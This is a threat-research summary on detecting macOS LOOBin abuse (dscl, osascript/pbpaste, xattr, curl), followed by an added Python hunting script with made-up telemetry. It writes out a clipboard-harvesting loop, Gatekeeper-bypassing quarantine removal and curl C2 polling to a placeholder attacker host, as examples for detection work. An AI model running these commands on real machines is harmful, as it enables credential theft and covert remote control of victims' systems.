Securonix Threat Research Knowledge Sharing Series: Detecting MacOS LOOBins Attack Activity Using Security Analytics

This article documents how legitimate macOS binaries (LOOBins) such as dscl, osascript/pbpaste, xattr, and curl are abused for discovery, clipboard theft, Gatekeeper bypass, and C2. It provides command examples and detection queries customers can use with EDR/Spotter or osquery to find these behaviors. #MacStealer #Villain

Key points

  • LOOBins are built-in macOS binaries that attackers leverage across the attack chain to evade detection and perform discovery, collection, defense evasion, and C2.
  • dscl is used for account and AD/environment enumeration with commands like "dscl . -list /Users" and "dscl '/Active Directory/…/All Domains' -read /Users/$USERNAME".
  • osascript and pbpaste can be run in loops to capture clipboard contents to files (e.g., clipdata.txt, loot.txt), enabling credential harvesting.
  • xattr -d com.apple.quarantine (and recursive variants) is used to remove quarantine attributes and bypass Gatekeeper/notarization checks, observed in OceanLotus and WindTail activity.
  • Villain-based payloads use native tools (nohup, curl, pkill, sleep, echo) with repeated curl calls and an Authorization header for bidirectional C2 communication.
  • Detections should rely on detailed process/command-line logging from EDR or osquery; the article supplies Spotter queries to hunt for dscl, osascript/pbpaste, xattr, curl, launchctl, and defaults abuse.

MITRE Techniques

  • [T1087] Account Discovery – dscl is used to enumerate accounts and directory data ("dscl . -list /Users")
  • [T1087.001] Account Discovery: Local Account – dscl commands enumerate local user and group details ("dscl . -read /Users/$USERNAME")
  • [T1087.002] Account Discovery: Domain Account – dscl targets Active Directory paths to list/read domain users/groups ('dscl "/Active Directory/TEST/All Domains" -list /Users')
  • [T1135] Network Share Discovery – dscl and related commands can list network share points ("dscl . -list /SharePoints")
  • [T1201] Password Policy Discovery – dscl reads the shadowhash configuration to reveal password policy info ("dscl . -read /Config/shadowhash")
  • [T1115] Clipboard Data – osascript and pbpaste are used to read clipboard contents and append them to files in a loop ("while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done")
  • [T1553] Subvert Trust Controls – xattr is used to modify file attributes to bypass trust controls and notarization checks ("xattr -d com.apple.quarantine FILE")
  • [T1553.001] Subvert Trust Controls: Gatekeeper Bypass – recursive removal of com.apple.quarantine is used to skip Gatekeeper ("xattr -d -r com.apple.quarantine *")
  • [T1102] Web Service – curl is repeatedly used to contact attacker-controlled web services for C2 communication ('curl -s http://[attackerip]:[attackerport]/[clientid] -H "Authorization: [authtoken]"')
  • [T1102.002] Web Service: Bidirectional Communication – Villain payloads poll and post commands/results via curl with an Authorization header for bidirectional C2 ('curl -s "$p$s/c5f960d6/$hname/$USER" -H "Authorization: $i" -o /dev/null')

Indicators of Compromise

  • [File names] Clipboard exfiltration artifacts – clipdata.txt, loot.txt
  • [Command/HTTP pattern] Repeated curl C2 calls – curl -s http://[attackerip]:[attackerport]/[clientid] -H "Authorization: [authtoken]" (used frequently by Villain), and dozens of similar curl invocations
  • [File attribute] Gatekeeper/quarantine marker – com.apple.quarantine (examples: xattr -d com.apple.quarantine FILE, xattr -d -r com.apple.quarantine *)
  • [Binaries/process names] LOOBin binaries used as living-off-the-orchard indicators – dscl, osascript, pbpaste, xattr, nohup, curl (observed in process chains)

dscl, osascript/pbpaste, xattr, and curl are the primary LOOBins illustrated, along with examples and detection logic. For discovery, dscl commands enumerate local and Active Directory accounts (e.g., "dscl . -list /Users", "dscl '/Active Directory/…/All Domains' -read /Users/$USERNAME"), which should be flagged when seen originating from non-admin contexts or paired with list/read flags. For collection, clipboard harvesting uses osascript or pbpaste in loops to write plaintext clipboard contents to files (e.g., "while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done"), so detections should look for osascript/pbpaste with '-e', 'return', '(the clipboard)', or repeated file append operations.

For defense evasion, xattr is used to strip the quarantine attribute and bypass Gatekeeper (examples: "xattr -d com.apple.quarantine FILE", "xattr -d -r com.apple.quarantine *"); watch for xattr invocations targeting com.apple.quarantine with -d or -r flags. Villain-style C2 leverages nohup and frequent curl calls with specific flags and headers (e.g., "curl -s http://[attackerip]:[attackerport]/[clientid] -H 'Authorization: [authtoken]'"); detection can focus on repeated curl invocations containing '-s' and an Authorization header, or on abnormal outbound web service requests from endpoints.

Operational detection guidance: ingest detailed process and command-line telemetry via modern EDR or osquery, then apply search rules that match dscl list/read patterns, osascript/pbpaste clipboard access and looping writes, xattr -d/-r against com.apple.quarantine, and curl commands with '-s' plus '-H "Authorization:"'. The article includes Spotter queries for these behaviors and recommends prioritizing EDR/osquery telemetry to reliably surface LOOBin abuse across macOS fleets.
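The following Python script is an added example, not code from the Securonix article and not one of its Spotter queries. It applies the four command-line patterns described above (dscl list/read, osascript/pbpaste clipboard access, xattr -d/-r against com.apple.quarantine, curl -s with an Authorization header) to a constructed batch of osquery-style process events, and adds a repeated-spawn heuristic that covers both the clipboard loop from the collection paragraph and the repeated curl polling from the C2 paragraph. The event shape (time, host, uid, pid, ppid, cmdline), the loop window and threshold, the 203.0.113.5 address and the token string are assumptions made for the example.

```python
"""Hunt for macOS LOOBin abuse in process/command-line telemetry.

Added example (not Securonix code): matches the dscl / osascript+pbpaste /
xattr / curl patterns from the article against events shaped like osquery's
process_events table, and flags repeated spawns of the same LOOBin under one
parent, which is how the clipboard loop and Villain curl polling show up.
"""
import re
from collections import defaultdict

# Constructed sample telemetry (osquery process_events-like dicts); not real data.
# 203.0.113.5 is a documentation address and "tok-constructed" a made-up token.
C2 = "curl -s http://203.0.113.5:8080/abc123 -H Authorization: tok-constructed -o /dev/null"
CLIP = "osascript -e return (the clipboard)"   # argv joined by spaces, quotes gone
SAMPLE_EVENTS = [
    {"time": 1000, "host": "mbp-01", "uid": 501, "pid": 4101, "ppid": 4100, "cmdline": "ls -la /Users"},
    {"time": 1005, "host": "mbp-01", "uid": 501, "pid": 4102, "ppid": 4100, "cmdline": "dscl . -list /Users"},
    {"time": 1006, "host": "mbp-01", "uid": 501, "pid": 4103, "ppid": 4100,
     "cmdline": "dscl /Active Directory/TEST/All Domains -read /Users/jdoe"},
    {"time": 1007, "host": "mbp-01", "uid": 501, "pid": 4104, "ppid": 4100, "cmdline": "dscl . -read /Config/shadowhash"},
    {"time": 1010, "host": "mbp-01", "uid": 501, "pid": 4105, "ppid": 4100, "cmdline": "xattr -l /Users/jdoe/Downloads/report.pdf"},
    {"time": 1011, "host": "mbp-01", "uid": 501, "pid": 4106, "ppid": 4100,
     "cmdline": "xattr -d com.apple.quarantine /Users/jdoe/Downloads/Installer.app"},
    {"time": 1020, "host": "mbp-01", "uid": 501, "pid": 4107, "ppid": 4100, "cmdline": CLIP},
    {"time": 1030, "host": "mbp-01", "uid": 501, "pid": 4108, "ppid": 4100, "cmdline": CLIP},
    {"time": 1040, "host": "mbp-01", "uid": 501, "pid": 4109, "ppid": 4100, "cmdline": CLIP},
    {"time": 1050, "host": "mbp-02", "uid": 502, "pid": 5101, "ppid": 5100, "cmdline": "curl -fsSL https://example.com/install.sh"},
    {"time": 1100, "host": "mbp-02", "uid": 502, "pid": 5102, "ppid": 5100, "cmdline": C2},
    {"time": 1105, "host": "mbp-02", "uid": 502, "pid": 5103, "ppid": 5100, "cmdline": C2},
    {"time": 1110, "host": "mbp-02", "uid": 502, "pid": 5104, "ppid": 5100, "cmdline": C2},
    {"time": 1115, "host": "mbp-02", "uid": 502, "pid": 5105, "ppid": 5100, "cmdline": C2},
    {"time": 1200, "host": "mbp-02", "uid": 502, "pid": 5106, "ppid": 5100, "cmdline": "pbpaste"},
]

# (rule name, MITRE technique(s), severity, regex over the joined command line)
RULES = [
    ("dscl_directory_discovery", "T1087/T1135/T1201", "medium",
     re.compile(r"(?:^|/)dscl\b.*\s-(?:list|read)\s+/(?:Users|Groups|SharePoints|Config)\b")),
    ("clipboard_read", "T1115", "low",
     re.compile(r"(?:^|/)osascript\b.*the clipboard|(?:^|/)pbpaste\b")),
    ("quarantine_strip", "T1553.001", "high",
     re.compile(r"(?:^|/)xattr\b.*\s-[dr]{1,2}\b.*com\.apple\.quarantine")),
    ("curl_auth_header", "T1102.002", "medium",
     re.compile(r"(?:^|/)curl\b.*\s-s\b.*\s-H\s+[\"']?Authorization:")),
]
TECHNIQUE = {name: tech for name, tech, _, _ in RULES}

# Rules whose single hits are weak on their own but strong when spawned repeatedly
# by the same parent (the "while true; ... sleep 10" loop and curl polling).
LOOP_RULES = {"clipboard_read", "curl_auth_header"}
LOOP_WINDOW = 120     # seconds (assumed tuning value)
LOOP_MIN_HITS = 3     # spawns within the window (assumed tuning value)


def _max_hits_in_window(times, window):
    """Largest number of timestamps that fall inside any span of `window` seconds."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(events):
    """Return one finding per matching event, plus loop findings per (host, parent, rule)."""
    findings = []
    spawns = defaultdict(list)           # (host, ppid, rule) -> spawn timestamps
    for ev in events:
        for name, tech, severity, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append({"rule": name, "technique": tech, "severity": severity,
                                 "host": ev["host"], "pid": ev["pid"], "cmdline": ev["cmdline"]})
                if name in LOOP_RULES:
                    spawns[(ev["host"], ev["ppid"], name)].append(ev["time"])
    for (host, ppid, name), times in spawns.items():
        hits = _max_hits_in_window(times, LOOP_WINDOW)
        if hits >= LOOP_MIN_HITS:
            findings.append({"rule": name + "_loop", "technique": TECHNIQUE[name], "severity": "high",
                             "host": host, "pid": ppid,
                             "cmdline": f"{hits} spawns under parent {ppid} within {LOOP_WINDOW}s"})
    return findings


def summarize(findings):
    """Count findings per rule name."""
    counts = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['rule']:24} {f['technique']:18} {f['host']} pid={f['pid']} :: {f['cmdline']}")
```

The `>> clipdata.txt` redirect lives in the parent shell, so the osascript child's command line never shows it; the spawn count keyed on (host, parent pid, rule) is what separates the harvesting loop from a user's one-off clipboard read, and the same key turns four near-identical `curl -s ... -H Authorization:` calls into a single high-severity polling finding. Benign `xattr -l`, `xattr -p` and `curl -fsSL` lines deliberately do not match; tune the window, threshold and dscl path list to the fleet's telemetry volume.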

Read more: https://www.securonix.com/blog/detecting-macos-loobins-attack-activity-using-security-analytics/